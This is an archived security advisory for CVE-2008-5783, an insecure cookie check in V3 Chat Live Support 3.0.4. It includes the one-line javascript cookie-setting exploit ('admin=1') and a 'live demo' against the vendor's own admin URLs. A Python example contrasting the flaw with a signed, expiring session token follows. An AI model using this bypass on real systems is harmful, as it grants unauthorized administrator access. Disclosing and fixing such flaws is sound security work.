Bug: V3 Chat Live Support 3.0.4 Insecure Cookie Handling Vulnerability (WLB-2009010106 Ascii Version)

 Topic: V3 Chat Live Support 3.0.4 Insecure Cookie Handling Vulnerability
 Credit: Cyber-Zone
 Date: 2009.01.03
 CWE: CWE-287
 CVE: CVE-2008-5783
 Risk: High
 Local: No
 Remote: Yes

+---- In the name of God, the Most Gracious, the Most Merciful ----+

Proud To Be MoroCCaN

[ V3 Chat Live Support v3.0.4 Insecure Cookie Handling Vulnerability ]

 Author   : Cyber-Zone (Abdelkhalek)
 E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr
 Home     : WwW.IQ-Ty.CoM
 From     : MoroCCo
 Script   : http://v3chat.com
 Download : http://v3chat.com/live_support.php
 RisK     : High

 From The Dark Side Of MoroCCo

 Remember:
 This information is for educational purposes only; Cyber-Zone will not bear responsibility for any damages.

[!] Dedicated to everyone I was hard on, and those I insulted in my index. I want to tell them: you have seen nothing yet, and what is coming is worse [!]


Put this code in the URL:

javascript:document.cookie = "admin=1; path=/";

Live demo :

javascript:document.cookie = "admin=1; path=/v3livesupport-v304/admin/index.php; domain=v3chat.commain.php";

http://v3chat.com/v3livesupport-v304/admin/index.php

Then press Enter again on this URL:

http://v3chat.com/v3livesupport-v304/admin/messages.php

Please wait, logging you in... :)



+---- ThanX To ----+
[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]

= [AttaCk Is CompLet] =
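
The weakness reported above (CWE-287: the admin area accepts a cookie value the browser can set itself) shown next to a server-verified alternative, as an added example that is not part of the original advisory or of the V3 Chat code. The function names, the admin_session cookie name, the key and the 30-minute lifetime are assumptions for illustration, and the flawed check is a reconstruction of the pattern the advisory implies, written in Python rather than the product's PHP.

```python
import hashlib
import hmac
import time

# Constructed key for this example; a real deployment loads a random secret
# from server-side configuration and never ships it to the browser.
SERVER_KEY = b"constructed-example-key"
SESSION_TTL = 1800  # token lifetime in seconds (assumed policy)


def is_admin_vulnerable(cookies):
    """Flawed pattern: a value the browser can set is taken as proof of login."""
    return cookies.get("admin") == "1"


def _mac(payload, key):
    return hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()


def issue_admin_token(username, now=None, key=SERVER_KEY):
    """Call only after the password check succeeds; binds user and expiry."""
    if "|" in username:
        raise ValueError("separator not allowed in username")
    expires = int(time.time() if now is None else now) + SESSION_TTL
    payload = f"{username}|{expires}"
    return f"{payload}|{_mac(payload, key)}"


def is_admin_hardened(cookies, now=None, key=SERVER_KEY):
    """Accept only an unexpired token whose MAC the server can recompute."""
    parts = cookies.get("admin_session", "").split("|")
    if len(parts) != 3:
        return False
    username, expires, mac = parts
    expected = _mac(f"{username}|{expires}", key)
    # Constant-time comparison on bytes; rejects forged or edited tokens.
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return False
    # expires is trusted only now, because the MAC covered it.
    return int(expires) > int(time.time() if now is None else now)
```

In a PHP application the same effect is usually reached with server-side session state set at login, so the cookie carries only an opaque session identifier and no authorization value.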

References:

http://www.securityfocus.com/bid/32216
http://www.milw0rm.com/exploits/7069
http://www.frsirt.com/english/advisories/2008/3066
http://secunia.com/advisories/32603


Copyright 2012, cxsecurity.com